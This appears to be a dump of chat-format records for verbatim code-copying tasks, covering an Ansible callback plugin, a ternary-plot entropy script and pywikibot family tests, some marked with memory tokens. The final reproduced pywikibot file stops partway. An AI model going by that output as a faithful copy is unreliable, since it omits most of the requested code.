self.expect_expr("a.begin()->a", result_type="int", result_value="2")
self.expect_expr("a.rbegin()->a", result_type="int", result_value="3")
```
|
[
{
"content": "Return the code unaltered:\n```python\n# Make coding more python3-ish\nfrom __future__ import (absolute_import, division, print_function)\n__metaclass__ = type\n\n\nfrom ansible.plugins.callback.default import (\n CallbackModule as CallbackModule_default\n)\nfrom ansible import constants as C\n\n\"\"\"Implementation of Custom Class that inherits the 'default' stdout_callback\nplugin and overrides the v2_runner_retry api for displaying the 'FAILED -\nRETRYING' only during verbose mode.\"\"\"\n\n\nclass CallbackModule(CallbackModule_default):\n\n CALLBACK_VERSION = 2.0\n CALLBACK_TYPE = 'stdout'\n CALLBACK_NAME = 'openebs'\n CALLBACK_NEEDS_WHITELIST = False\n\n def v2_runner_retry(self, result):\n task_name = result.task_name or result._task\n final_result = result._result['retries'] - result._result['attempts']\n msg = \"FAILED - RETRYING: %s (%d retries left).\" % (task_name,\n final_result)\n display_verbosity = self._display.verbosity\n required_result = '_ansible_verbose_always'\n if (display_verbosity > 2 or required_result in result._result):\n if required_result not in result._result:\n msg += \"Result was: %s\" % self._dump_results(result._result)\n self._display.v('%s' % (msg))\n\n def v2_runner_on_skipped(self, result):\n my_result = result._result\n required_result = '_ansible_verbose_always'\n\n if C.DISPLAY_SKIPPED_HOSTS:\n if (self._display.verbosity > 0 or required_result in my_result):\n if required_result not in my_result:\n dumped_results = self._dump_results(my_result)\n msg = \"skipping: [%s] => %s\" % (result._host.get_name(),\n dumped_results)\n self._display.display(msg, color=C.COLOR_SKIP)\n\n else:\n self._display.display(\"skipping task..\", color=C.COLOR_SKIP)\n\n def v2_runner_item_on_skipped(self, result):\n my_result = result._result\n required_result = '_ansible_verbose_always'\n\n if C.DISPLAY_SKIPPED_HOSTS:\n if (self._display.verbosity > 0 or required_result in my_result):\n if required_result not in my_result:\n required_item = self._get_item(my_result)\n dumped_result = self._dump_results(my_result)\n result_host = result._host.get_name()\n msg = \"skipping: [%s] => (item=%s) => %s\" % (result_host,\n required_item,\n dumped_result)\n self._display.display(msg, color=C.COLOR_SKIP)\n```\nExact characters only.",
"role": "user"
}
] |
[
{
"content": "Return the code unaltered:\n<|memory_start|>```python\n# Make coding more python3-ish\nfrom __future__ import (absolute_import, division, print_function)\n__metaclass__ = type\n\n\nfrom ansible.plugins.callback.default import (\n CallbackModule as CallbackModule_default\n)\nfrom ansible import constants as C\n\n\"\"\"Implementation of Custom Class that inherits the 'default' stdout_callback\nplugin and overrides the v2_runner_retry api for displaying the 'FAILED -\nRETRYING' only during verbose mode.\"\"\"\n\n\nclass CallbackModule(CallbackModule_default):\n\n CALLBACK_VERSION = 2.0\n CALLBACK_TYPE = 'stdout'\n CALLBACK_NAME = 'openebs'\n CALLBACK_NEEDS_WHITELIST = False\n\n def v2_runner_retry(self, result):\n task_name = result.task_name or result._task\n final_result = result._result['retries'] - result._result['attempts']\n msg = \"FAILED - RETRYING: %s (%d retries left).\" % (task_name,\n final_result)\n display_verbosity = self._display.verbosity\n required_result = '_ansible_verbose_always'\n if (display_verbosity > 2 or required_result in result._result):\n if required_result not in result._result:\n msg += \"Result was: %s\" % self._dump_results(result._result)\n self._display.v('%s' % (msg))\n\n def v2_runner_on_skipped(self, result):\n my_result = result._result\n required_result = '_ansible_verbose_always'\n\n if C.DISPLAY_SKIPPED_HOSTS:\n if (self._display.verbosity > 0 or required_result in my_result):\n if required_result not in my_result:\n dumped_results = self._dump_results(my_result)\n msg = \"skipping: [%s] => %s\" % (result._host.get_name(),\n dumped_results)\n self._display.display(msg, color=C.COLOR_SKIP)\n\n else:\n self._display.display(\"skipping task..\", color=C.COLOR_SKIP)\n\n def v2_runner_item_on_skipped(self, result):\n my_result = result._result\n required_result = '_ansible_verbose_always'\n\n if C.DISPLAY_SKIPPED_HOSTS:\n if (self._display.verbosity > 0 or required_result in my_result):\n if required_result not in my_result:\n required_item = self._get_item(my_result)\n dumped_result = self._dump_results(my_result)\n result_host = result._host.get_name()\n msg = \"skipping: [%s] => (item=%s) => %s\" % (result_host,\n required_item,\n dumped_result)\n self._display.display(msg, color=C.COLOR_SKIP)\n```<|memory_end|>\nExact characters only.",
"role": "user"
}
] |
```python
# Make coding more python3-ish
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
from ansible.plugins.callback.default import (
CallbackModule as CallbackModule_default
)
from ansible import constants as C
"""Implementation of Custom Class that inherits the 'default' stdout_callback
plugin and overrides the v2_runner_retry api for displaying the 'FAILED -
RETRYING' only during verbose mode."""
class CallbackModule(CallbackModule_default):
CALLBACK_VERSION = 2.0
CALLBACK_TYPE = 'stdout'
CALLBACK_NAME = 'openebs'
CALLBACK_NEEDS_WHITELIST = False
def v2_runner_retry(self, result):
task_name = result.task_name or result._task
final_result = result._result['retries'] - result._result['attempts']
msg = "FAILED - RETRYING: %s (%d retries left)." % (task_name,
final_result)
display_verbosity = self._display.verbosity
required_result = '_ansible_verbose_always'
if (display_verbosity > 2 or required_result in result._result):
if required_result not in result._result:
msg += "Result was: %s" % self._dump_results(result._result)
self._display.v('%s' % (msg))
def v2_runner_on_skipped(self, result):
my_result = result._result
required_result = '_ansible_verbose_always'
if C.DISPLAY_SKIPPED_HOSTS:
if (self._display.verbosity > 0 or required_result in my_result):
if required_result not in my_result:
dumped_results = self._dump_results(my_result)
msg = "skipping: [%s] => %s" % (result._host.get_name(),
dumped_results)
self._display.display(msg, color=C.COLOR_SKIP)
else:
self._display.display("skipping task..", color=C.COLOR_SKIP)
def v2_runner_item_on_skipped(self, result):
my_result = result._result
required_result = '_ansible_verbose_always'
if C.DISPLAY_SKIPPED_HOSTS:
if (self._display.verbosity > 0 or required_result in my_result):
if required_result not in my_result:
required_item = self._get_item(my_result)
dumped_result = self._dump_results(my_result)
result_host = result._host.get_name()
msg = "skipping: [%s] => (item=%s) => %s" % (result_host,
required_item,
dumped_result)
self._display.display(msg, color=C.COLOR_SKIP)
```
|
[
{
"content": "Here is the code block:\n```python\n\"\"\" Compute ternary contours using matplotlib.pyplot.contour function \"\"\"\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport ternary\nimport math\nimport itertools\n\n\ndef shannon_entropy(p):\n \"\"\"Computes the Shannon Entropy at a distribution in the simplex.\"\"\"\n s = 0.\n for i in range(len(p)):\n try:\n s += p[i] * math.log(p[i])\n except ValueError:\n continue\n return -1. * s\n\nscale = 20\nlevel = [0.25, 0.5, 0.8, 0.9] # values for contours\n\n# === prepare coordinate list for contours\nx_range = np.arange(0, 1.01, 0.01) # ensure that grid spacing is small enough to get smooth contours\ncoordinate_list = np.asarray(list(itertools.product(x_range, repeat=2)))\ncoordinate_list = np.append(coordinate_list, (1 - coordinate_list[:, 0] - coordinate_list[:, 1]).reshape(-1, 1), axis=1)\n\n# === calculate data with coordinate list\ndata_list = []\nfor point in coordinate_list:\n data_list.append(shannon_entropy(point))\ndata_list = np.asarray(data_list)\ndata_list[np.sum(coordinate_list[:, 0:2], axis=1) > 1] = np.nan # remove data outside triangle\n\n# === reshape coordinates and data for use with pyplot contour function\nx = coordinate_list[:, 0].reshape(x_range.shape[0], -1)\ny = coordinate_list[:, 1].reshape(x_range.shape[0], -1)\n\nh = data_list.reshape(x_range.shape[0], -1)\n\n# === use pyplot to calculate contours\ncontours = plt.contour(x, y, h, level) # this needs to be BEFORE figure definition\nplt.clf() # makes sure that contours are not plotted in carthesian plot\n\nfig, tax = ternary.figure(scale=scale)\n\n# === plot contour lines\nfor ii, contour in enumerate(contours.allsegs):\n for jj, seg in enumerate(contour):\n tax.plot(seg[:, 0:2] * scale, color='r')\n\n# === plot regular data\ntax.heatmapf(shannon_entropy, boundary=True, style='hexagonal', colorbar=True)\n\nplt.show()\n```\nOutput it precisely.",
"role": "user"
}
] |
[
{
"content": "Here is the code block:\n<|memory_start|>```python\n\"\"\" Compute ternary contours using matplotlib.pyplot.contour function \"\"\"\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport ternary\nimport math\nimport itertools\n\n\ndef shannon_entropy(p):\n \"\"\"Computes the Shannon Entropy at a distribution in the simplex.\"\"\"\n s = 0.\n for i in range(len(p)):\n try:\n s += p[i] * math.log(p[i])\n except ValueError:\n continue\n return -1. * s\n\nscale = 20\nlevel = [0.25, 0.5, 0.8, 0.9] # values for contours\n\n# === prepare coordinate list for contours\nx_range = np.arange(0, 1.01, 0.01) # ensure that grid spacing is small enough to get smooth contours\ncoordinate_list = np.asarray(list(itertools.product(x_range, repeat=2)))\ncoordinate_list = np.append(coordinate_list, (1 - coordinate_list[:, 0] - coordinate_list[:, 1]).reshape(-1, 1), axis=1)\n\n# === calculate data with coordinate list\ndata_list = []\nfor point in coordinate_list:\n data_list.append(shannon_entropy(point))\ndata_list = np.asarray(data_list)\ndata_list[np.sum(coordinate_list[:, 0:2], axis=1) > 1] = np.nan # remove data outside triangle\n\n# === reshape coordinates and data for use with pyplot contour function\nx = coordinate_list[:, 0].reshape(x_range.shape[0], -1)\ny = coordinate_list[:, 1].reshape(x_range.shape[0], -1)\n\nh = data_list.reshape(x_range.shape[0], -1)\n\n# === use pyplot to calculate contours\ncontours = plt.contour(x, y, h, level) # this needs to be BEFORE figure definition\nplt.clf() # makes sure that contours are not plotted in carthesian plot\n\nfig, tax = ternary.figure(scale=scale)\n\n# === plot contour lines\nfor ii, contour in enumerate(contours.allsegs):\n for jj, seg in enumerate(contour):\n tax.plot(seg[:, 0:2] * scale, color='r')\n\n# === plot regular data\ntax.heatmapf(shannon_entropy, boundary=True, style='hexagonal', colorbar=True)\n\nplt.show()\n```<|memory_end|>\nOutput it precisely.",
"role": "user"
}
] |
```python
""" Compute ternary contours using matplotlib.pyplot.contour function """
import numpy as np
import matplotlib.pyplot as plt
import ternary
import math
import itertools
def shannon_entropy(p):
"""Computes the Shannon Entropy at a distribution in the simplex."""
s = 0.
for i in range(len(p)):
try:
s += p[i] * math.log(p[i])
except ValueError:
continue
return -1. * s
scale = 20
level = [0.25, 0.5, 0.8, 0.9] # values for contours
# === prepare coordinate list for contours
x_range = np.arange(0, 1.01, 0.01) # ensure that grid spacing is small enough to get smooth contours
coordinate_list = np.asarray(list(itertools.product(x_range, repeat=2)))
coordinate_list = np.append(coordinate_list, (1 - coordinate_list[:, 0] - coordinate_list[:, 1]).reshape(-1, 1), axis=1)
# === calculate data with coordinate list
data_list = []
for point in coordinate_list:
data_list.append(shannon_entropy(point))
data_list = np.asarray(data_list)
data_list[np.sum(coordinate_list[:, 0:2], axis=1) > 1] = np.nan # remove data outside triangle
# === reshape coordinates and data for use with pyplot contour function
x = coordinate_list[:, 0].reshape(x_range.shape[0], -1)
y = coordinate_list[:, 1].reshape(x_range.shape[0], -1)
h = data_list.reshape(x_range.shape[0], -1)
# === use pyplot to calculate contours
contours = plt.contour(x, y, h, level) # this needs to be BEFORE figure definition
plt.clf() # makes sure that contours are not plotted in carthesian plot
fig, tax = ternary.figure(scale=scale)
# === plot contour lines
for ii, contour in enumerate(contours.allsegs):
for jj, seg in enumerate(contour):
tax.plot(seg[:, 0:2] * scale, color='r')
# === plot regular data
tax.heatmapf(shannon_entropy, boundary=True, style='hexagonal', colorbar=True)
plt.show()
```
|
[
{
"content": "Here is some code:\n```python\n# -*- coding: utf-8 -*-\n\"\"\"Tests for the family module.\"\"\"\n#\n# (C) Pywikibot team, 2014-2015\n#\n# Distributed under the terms of the MIT license.\n#\nfrom __future__ import absolute_import, unicode_literals\n\n__version__ = '$Id$'\n\nfrom pywikibot.family import Family, SingleSiteFamily\nfrom pywikibot.exceptions import UnknownFamily\nfrom pywikibot.tools import PY2\n\nimport pywikibot.site\n\nfrom tests.aspects import (\n unittest,\n TestCase,\n DeprecationTestCase,\n PatchingTestCase,\n)\nfrom tests.utils import DrySite\n\nif not PY2:\n basestring = (str, )\n\n\nclass TestFamily(TestCase):\n\n \"\"\"Test cases for Family methods.\"\"\"\n\n net = False\n\n def test_family_load_valid(self):\n \"\"\"Test that a family can be loaded via Family.load.\"\"\"\n for name in pywikibot.config.family_files:\n f = Family.load(name)\n self.assertIsInstance(f.langs, dict)\n self.assertTrue(f.langs)\n self.assertTrue(f.codes)\n self.assertTrue(iter(f.codes))\n self.assertIsInstance(next(iter(f.codes)), basestring)\n self.assertTrue(f.domains)\n self.assertTrue(iter(f.domains))\n for domain in f.domains:\n self.assertIsInstance(domain, basestring)\n if domain != 'localhost':\n self.assertIn('.', domain)\n self.assertEqual(f.name, name)\n self.assertIsInstance(f.languages_by_size, list)\n self.assertGreaterEqual(set(f.langs), set(f.languages_by_size))\n if len(f.langs) > 6 and f.name != 'wikimediachapter':\n self.assertNotEqual(f.languages_by_size, [])\n if isinstance(f, SingleSiteFamily):\n self.assertIsNotNone(f.code)\n self.assertIsNotNone(f.domain)\n self.assertEqual(set(f.langs), set([f.code]))\n self.assertEqual(set(f.codes), set([f.code]))\n\n def test_family_load_invalid(self):\n \"\"\"Test that an invalid family raised UnknownFamily exception.\"\"\"\n self.assertRaises(UnknownFamily, Family.load, 'unknown')\n\n def test_eq_different_families_by_name(self):\n \"\"\"Test that two Family with same name are equal.\"\"\"\n family_1 = Family()\n family_2 = Family()\n family_1.name = 'a'\n family_2.name = 'a'\n self.assertNotEqual(id(family_1), id(family_2))\n self.assertEqual(family_1, family_2)\n\n def test_eq_different_families_by_id(self):\n \"\"\"Test that two Family with no name attribute are not equal.\"\"\"\n family_1 = Family()\n family_2 = Family()\n family_1.name = 'a'\n del family_2.name\n self.assertNotEqual(id(family_1), id(family_2))\n self.assertNotEqual(family_1, family_2)\n\n def test_eq_family_with_string_repr_same_family(self):\n \"\"\"Test that Family and string with same name are equal.\"\"\"\n family = Family.load('wikipedia')\n other = 'wikipedia'\n self.assertEqual(family, other)\n self.assertFalse(family != other)\n\n def test_ne_family_with_string_repr_different_family(self):\n \"\"\"Test that Family and string with different name are not equal.\"\"\"\n family = Family.load('wikipedia')\n other = 'wikisource'\n self.assertNotEqual(family, other)\n self.assertFalse(family == other)\n\n def test_eq_family_with_string_repr_not_existing_family(self):\n \"\"\"Test that Family and string with different name are not equal.\"\"\"\n family = Family.load('wikipedia')\n other = 'unknown'\n self.assertRaises(UnknownFamily, family.__eq__, other)\n\n def test_get_obsolete_wp(self):\n \"\"\"Test three types of obsolete codes.\"\"\"\n family = Family.load('wikipedia')\n self.assertIsInstance(family.obsolete, dict)\n # redirected code (see site tests test_alias_code_site)\n self.assertEqual(family.obsolete['dk'], 'da')\n # closed/locked site (see site tests test_locked_site)\n self.assertEqual(family.obsolete['mh'], None)\n # offline site (see site tests test_removed_site)\n self.assertEqual(family.obsolete['ru-sib'], None)\n\n def test_get_obsolete_test(self):\n \"\"\"Test WikimediaFamily default obsolete.\"\"\"\n family = Family.load('test')\n self.assertIn('dk', family.obsolete)\n self.assertIn('dk', family.interwiki_replacements)\n self.assertEqual(family.obsolete, family.interwiki_replacements)\n self.assertEqual(family.interwiki_removals, set())\n\n def test_set_obsolete(self):\n \"\"\"Test obsolete can be set.\"\"\"\n family = Family()\n self.assertEqual(family.obsolete, {})\n self.assertEqual(family.interwiki_replacements, {})\n self.assertEqual(family.interwiki_removals, [])\n\n family.obsolete = {'a': 'b', 'c': None}\n self.assertEqual(family.obsolete, {'a': 'b', 'c': None})\n self.assertEqual(family.interwiki_replacements, {'a': 'b'})\n self.assertEqual(family.interwiki_removals, ['c'])\n\n def test_obsolete_readonly(self):\n \"\"\"Test obsolete result not updatable.\"\"\"\n family = Family.load('test')\n self.assertRaises(TypeError, family.obsolete.update, {})\n self.assertRaises(TypeError, family.obsolete.__setitem__, 'a', 'b')\n\n def test_WikimediaFamily_obsolete_readonly(self):\n \"\"\"Test WikimediaFamily obsolete is readonly.\"\"\"\n family = Family.load('test')\n self.assertRaises(TypeError, family.__setattr__, 'obsolete',\n {'a': 'b', 'c': None})\n\n\nclass TestFamilyUrlRegex(PatchingTestCase):\n\n \"\"\"Test family URL regex.\"\"\"\n\n net = False\n\n @PatchingTestCase.patched(pywikibot, 'Site')\n def Site(self, code, fam, *args, **kwargs):\n \"\"\"Own DrySite creator.\"\"\"\n self.assertEqual(args, tuple())\n self.assertEqual(kwargs, {})\n self.assertEqual(code, self.current_code)\n self.assertEqual(fam, self.current_family)\n site = DrySite(code, fam, None, None)\n site._siteinfo._cache['general'] = ({'articlepath': self.article_path},\n True)\n return site\n\n def setUp(self):\n \"\"\"Setup default article path.\"\"\"\n super(TestFamilyUrlRegex, self).setUp()\n self.article_path = '/wiki/$1'\n\n def test_from_url_wikipedia_extra(self):\n \"\"\"Test various URLs against wikipedia regex.\"\"\"\n self.current_code = 'vo'\n self.current_family = 'wikipedia'\n\n f = Family.load('wikipedia')\n\n prefix = 'https://vo.wikipedia.org'\n\n self.assertEqual(f.from_url(prefix + '/wiki/'), 'vo')\n self.assertEqual(f.from_url(prefix + '/w/index.php'), 'vo')\n self.assertEqual(f.from_url(prefix + '/w/index.php/'), 'vo')\n self.assertEqual(f.from_url(prefix + '/w/index.php?title=$1'), 'vo')\n\n self.assertEqual(f.from_url(prefix + '/wiki/$1'), 'vo')\n self.assertEqual(f.from_url('//vo.wikipedia.org/wiki/$1'), 'vo')\n self.assertEqual(f.from_url(prefix + '/w/index.php/$1'), 'vo')\n self.assertEqual(f.from_url('//vo.wikipedia.org/wiki/$1'), 'vo')\n\n # Text after $1 is not allowed\n self.assertRaises(ValueError, f.from_url,\n '//vo.wikipedia.org/wiki/$1/foo')\n\n # the IWM may contain the wrong protocol, but it's only used to\n # determine a site so using HTTP or HTTPS is not an issue\n self.assertEqual(f.from_url('http://vo.wikipedia.org/wiki/$1'), 'vo')\n\n # wrong protocol\n self.assertIsNone(f.from_url('ftp://vo.wikipedia.org/wiki/$1'))\n # wrong code\n self.assertIsNone(f.from_url('https://foobar.wikipedia.org/wiki/$1'))\n # wrong family\n self.assertIsNone(f.from_url('https://vo.wikibooks.org/wiki/$1'))\n self.assertIsNone(f.from_url('http://vo.wikibooks.org/wiki/$1'))\n # invalid path\n self.assertIsNone(f.from_url('https://vo.wikipedia.org/wik/$1'))\n self.assertIsNone(f.from_url('https://vo.wikipedia.org/index.php/$1'))\n\n def test_each_family(self):\n \"\"\"Test each family builds a working regex.\"\"\"\n for family in pywikibot.config.family_files:\n self.current_family = family\n family = Family.load(family)\n for code in family.codes:\n self.current_code = code\n url = ('%s://%s%s/$1' % (family.protocol(code),\n family.hostname(code),\n family.path(code)))\n # Families can switch off if they want to be detected using URL\n # this applies for test:test (there is test:wikipedia)\n if family._ignore_from_url or code in family._ignore_from_url:\n self.assertIsNone(family.from_url(url))\n else:\n self.assertEqual(family.from_url(url), code)\n\n\nclass TestOldFamilyMethod(DeprecationTestCase):\n\n \"\"\"Test cases for old site.Family method.\"\"\"\n\n net = False\n\n def test_old_site_family_function(self):\n \"\"\"Test deprecated Family function with valid families.\"\"\"\n f = pywikibot.site.Family('species')\n self.assertEqual(f.name, 'species')\n f = pywikibot.site.Family('osm')\n self.assertEqual(f.name, 'osm')\n self.assertOneDeprecationParts('pywikibot.site.Family',\n 'pywikibot.family.Family.load', 2)\n\n # @deprecated warning occurs within redirect_func's call\n # invoking the method instead of this test module.\n self._do_test_warning_filename = False\n\n f = pywikibot.site.Family('i18n', fatal=False)\n self.assertEqual(f.name, 'i18n')\n self.assertDeprecationParts('pywikibot.site.Family',\n 'pywikibot.family.Family.load')\n self.assertDeprecationParts('fatal argument of pywikibot.family.Family.load')\n\n def test_old_site_family_function_invalid(self):\n \"\"\"Test that an invalid family raised UnknownFamily exception.\"\"\"\n # As assertRaises calls the method, unittest is the module\n # invoking the method instead of this test module.\n self._do_test_warning_filename = False\n self.assertRaises(UnknownFamily, pywikibot.site.Family, 'unknown',\n fatal=False)\n self.assertRaises(UnknownFamily, pywikibot.site.Family, 'unknown')\n self.assertDeprecationParts('pywikibot.site.Family',\n 'pywikibot.family.Family.load')\n self.assertDeprecationParts('fatal argument of pywikibot.family.Family.load')\n\n\nif __name__ == '__main__':\n try:\n unittest.main()\n except SystemExit:\n pass\n```\nOutput it word-for-word.",
"role": "user"
}
] |
[
{
"content": "Here is some code:\n<|memory_start|>```python\n# -*- coding: utf-8 -*-\n\"\"\"Tests for the family module.\"\"\"\n#\n# (C) Pywikibot team, 2014-2015\n#\n# Distributed under the terms of the MIT license.\n#\nfrom __future__ import absolute_import, unicode_literals\n\n__version__ = '$Id$'\n\nfrom pywikibot.family import Family, SingleSiteFamily\nfrom pywikibot.exceptions import UnknownFamily\nfrom pywikibot.tools import PY2\n\nimport pywikibot.site\n\nfrom tests.aspects import (\n unittest,\n TestCase,\n DeprecationTestCase,\n PatchingTestCase,\n)\nfrom tests.utils import DrySite\n\nif not PY2:\n basestring = (str, )\n\n\nclass TestFamily(TestCase):\n\n \"\"\"Test cases for Family methods.\"\"\"\n\n net = False\n\n def test_family_load_valid(self):\n \"\"\"Test that a family can be loaded via Family.load.\"\"\"\n for name in pywikibot.config.family_files:\n f = Family.load(name)\n self.assertIsInstance(f.langs, dict)\n self.assertTrue(f.langs)\n self.assertTrue(f.codes)\n self.assertTrue(iter(f.codes))\n self.assertIsInstance(next(iter(f.codes)), basestring)\n self.assertTrue(f.domains)\n self.assertTrue(iter(f.domains))\n for domain in f.domains:\n self.assertIsInstance(domain, basestring)\n if domain != 'localhost':\n self.assertIn('.', domain)\n self.assertEqual(f.name, name)\n self.assertIsInstance(f.languages_by_size, list)\n self.assertGreaterEqual(set(f.langs), set(f.languages_by_size))\n if len(f.langs) > 6 and f.name != 'wikimediachapter':\n self.assertNotEqual(f.languages_by_size, [])\n if isinstance(f, SingleSiteFamily):\n self.assertIsNotNone(f.code)\n self.assertIsNotNone(f.domain)\n self.assertEqual(set(f.langs), set([f.code]))\n self.assertEqual(set(f.codes), set([f.code]))\n\n def test_family_load_invalid(self):\n \"\"\"Test that an invalid family raised UnknownFamily exception.\"\"\"\n self.assertRaises(UnknownFamily, Family.load, 'unknown')\n\n def test_eq_different_families_by_name(self):\n \"\"\"Test that two Family with same name are equal.\"\"\"\n family_1 = Family()\n family_2 = Family()\n family_1.name = 'a'\n family_2.name = 'a'\n self.assertNotEqual(id(family_1), id(family_2))\n self.assertEqual(family_1, family_2)\n\n def test_eq_different_families_by_id(self):\n \"\"\"Test that two Family with no name attribute are not equal.\"\"\"\n family_1 = Family()\n family_2 = Family()\n family_1.name = 'a'\n del family_2.name\n self.assertNotEqual(id(family_1), id(family_2))\n self.assertNotEqual(family_1, family_2)\n\n def test_eq_family_with_string_repr_same_family(self):\n \"\"\"Test that Family and string with same name are equal.\"\"\"\n family = Family.load('wikipedia')\n other = 'wikipedia'\n self.assertEqual(family, other)\n self.assertFalse(family != other)\n\n def test_ne_family_with_string_repr_different_family(self):\n \"\"\"Test that Family and string with different name are not equal.\"\"\"\n family = Family.load('wikipedia')\n other = 'wikisource'\n self.assertNotEqual(family, other)\n self.assertFalse(family == other)\n\n def test_eq_family_with_string_repr_not_existing_family(self):\n \"\"\"Test that Family and string with different name are not equal.\"\"\"\n family = Family.load('wikipedia')\n other = 'unknown'\n self.assertRaises(UnknownFamily, family.__eq__, other)\n\n def test_get_obsolete_wp(self):\n \"\"\"Test three types of obsolete codes.\"\"\"\n family = Family.load('wikipedia')\n self.assertIsInstance(family.obsolete, dict)\n # redirected code (see site tests test_alias_code_site)\n self.assertEqual(family.obsolete['dk'], 'da')\n # closed/locked site (see site tests test_locked_site)\n self.assertEqual(family.obsolete['mh'], None)\n # offline site (see site tests test_removed_site)\n self.assertEqual(family.obsolete['ru-sib'], None)\n\n def test_get_obsolete_test(self):\n \"\"\"Test WikimediaFamily default obsolete.\"\"\"\n family = Family.load('test')\n self.assertIn('dk', family.obsolete)\n self.assertIn('dk', family.interwiki_replacements)\n self.assertEqual(family.obsolete, family.interwiki_replacements)\n self.assertEqual(family.interwiki_removals, set())\n\n def test_set_obsolete(self):\n \"\"\"Test obsolete can be set.\"\"\"\n family = Family()\n self.assertEqual(family.obsolete, {})\n self.assertEqual(family.interwiki_replacements, {})\n self.assertEqual(family.interwiki_removals, [])\n\n family.obsolete = {'a': 'b', 'c': None}\n self.assertEqual(family.obsolete, {'a': 'b', 'c': None})\n self.assertEqual(family.interwiki_replacements, {'a': 'b'})\n self.assertEqual(family.interwiki_removals, ['c'])\n\n def test_obsolete_readonly(self):\n \"\"\"Test obsolete result not updatable.\"\"\"\n family = Family.load('test')\n self.assertRaises(TypeError, family.obsolete.update, {})\n self.assertRaises(TypeError, family.obsolete.__setitem__, 'a', 'b')\n\n def test_WikimediaFamily_obsolete_readonly(self):\n \"\"\"Test WikimediaFamily obsolete is readonly.\"\"\"\n family = Family.load('test')\n self.assertRaises(TypeError, family.__setattr__, 'obsolete',\n {'a': 'b', 'c': None})\n\n\nclass TestFamilyUrlRegex(PatchingTestCase):\n\n \"\"\"Test family URL regex.\"\"\"\n\n net = False\n\n @PatchingTestCase.patched(pywikibot, 'Site')\n def Site(self, code, fam, *args, **kwargs):\n \"\"\"Own DrySite creator.\"\"\"\n self.assertEqual(args, tuple())\n self.assertEqual(kwargs, {})\n self.assertEqual(code, self.current_code)\n self.assertEqual(fam, self.current_family)\n site = DrySite(code, fam, None, None)\n site._siteinfo._cache['general'] = ({'articlepath': self.article_path},\n True)\n return site\n\n def setUp(self):\n \"\"\"Setup default article path.\"\"\"\n super(TestFamilyUrlRegex, self).setUp()\n self.article_path = '/wiki/$1'\n\n def test_from_url_wikipedia_extra(self):\n \"\"\"Test various URLs against wikipedia regex.\"\"\"\n self.current_code = 'vo'\n self.current_family = 'wikipedia'\n\n f = Family.load('wikipedia')\n\n prefix = 'https://vo.wikipedia.org'\n\n self.assertEqual(f.from_url(prefix + '/wiki/'), 'vo')\n self.assertEqual(f.from_url(prefix + '/w/index.php'), 'vo')\n self.assertEqual(f.from_url(prefix + '/w/index.php/'), 'vo')\n self.assertEqual(f.from_url(prefix + '/w/index.php?title=$1'), 'vo')\n\n self.assertEqual(f.from_url(prefix + '/wiki/$1'), 'vo')\n self.assertEqual(f.from_url('//vo.wikipedia.org/wiki/$1'), 'vo')\n self.assertEqual(f.from_url(prefix + '/w/index.php/$1'), 'vo')\n self.assertEqual(f.from_url('//vo.wikipedia.org/wiki/$1'), 'vo')\n\n # Text after $1 is not allowed\n self.assertRaises(ValueError, f.from_url,\n '//vo.wikipedia.org/wiki/$1/foo')\n\n # the IWM may contain the wrong protocol, but it's only used to\n # determine a site so using HTTP or HTTPS is not an issue\n self.assertEqual(f.from_url('http://vo.wikipedia.org/wiki/$1'), 'vo')\n\n # wrong protocol\n self.assertIsNone(f.from_url('ftp://vo.wikipedia.org/wiki/$1'))\n # wrong code\n self.assertIsNone(f.from_url('https://foobar.wikipedia.org/wiki/$1'))\n # wrong family\n self.assertIsNone(f.from_url('https://vo.wikibooks.org/wiki/$1'))\n self.assertIsNone(f.from_url('http://vo.wikibooks.org/wiki/$1'))\n # invalid path\n self.assertIsNone(f.from_url('https://vo.wikipedia.org/wik/$1'))\n self.assertIsNone(f.from_url('https://vo.wikipedia.org/index.php/$1'))\n\n def test_each_family(self):\n \"\"\"Test each family builds a working regex.\"\"\"\n for family in pywikibot.config.family_files:\n self.current_family = family\n family = Family.load(family)\n for code in family.codes:\n self.current_code = code\n url = ('%s://%s%s/$1' % (family.protocol(code),\n family.hostname(code),\n family.path(code)))\n # Families can switch off if they want to be detected using URL\n # this applies for test:test (there is test:wikipedia)\n if family._ignore_from_url or code in family._ignore_from_url:\n self.assertIsNone(family.from_url(url))\n else:\n self.assertEqual(family.from_url(url), code)\n\n\nclass TestOldFamilyMethod(DeprecationTestCase):\n\n \"\"\"Test cases for old site.Family method.\"\"\"\n\n net = False\n\n def test_old_site_family_function(self):\n \"\"\"Test deprecated Family function with valid families.\"\"\"\n f = pywikibot.site.Family('species')\n self.assertEqual(f.name, 'species')\n f = pywikibot.site.Family('osm')\n self.assertEqual(f.name, 'osm')\n self.assertOneDeprecationParts('pywikibot.site.Family',\n 'pywikibot.family.Family.load', 2)\n\n # @deprecated warning occurs within redirect_func's call\n # invoking the method instead of this test module.\n self._do_test_warning_filename = False\n\n f = pywikibot.site.Family('i18n', fatal=False)\n self.assertEqual(f.name, 'i18n')\n self.assertDeprecationParts('pywikibot.site.Family',\n 'pywikibot.family.Family.load')\n self.assertDeprecationParts('fatal argument of pywikibot.family.Family.load')\n\n def test_old_site_family_function_invalid(self):\n \"\"\"Test that an invalid family raised UnknownFamily exception.\"\"\"\n # As assertRaises calls the method, unittest is the module\n # invoking the method instead of this test module.\n self._do_test_warning_filename = False\n self.assertRaises(UnknownFamily, pywikibot.site.Family, 'unknown',\n fatal=False)\n self.assertRaises(UnknownFamily, pywikibot.site.Family, 'unknown')\n self.assertDeprecationParts('pywikibot.site.Family',\n 'pywikibot.family.Family.load')\n self.assertDeprecationParts('fatal argument of pywikibot.family.Family.load')\n\n\nif __name__ == '__main__':\n try:\n unittest.main()\n except SystemExit:\n pass\n```<|memory_end|>\nOutput it word-for-word.",
"role": "user"
}
] |
```python
# -*- coding: utf-8 -*-
"""Tests for the family module."""
#
# (C) Pywikibot team, 2014-2015
#
# Distributed under the terms of the MIT license.
#
from __future__ import absolute_import, unicode_literals
__version__ = '$Id$'
from pywikibot.family import Family, SingleSiteFamily
from pywikibot.exceptions import UnknownFamily
from pywikibot.tools import PY2
import pywikibot.site
from tests.aspects import (
unittest,
TestCase,
DeprecationTestCase,
PatchingTestCase,
)
from tests.utils import DrySite
if not PY2:
basestring = (str, )
class TestFamily(TestCase):
"""Test cases for Family methods."""
net = False
def test_family_load_valid(self):
"""Test that a family can be loaded via Family.load."""
for name in pywikibot.config.family_files:
f = Family.load(name)
self.assertIsInstance(f.langs, dict)
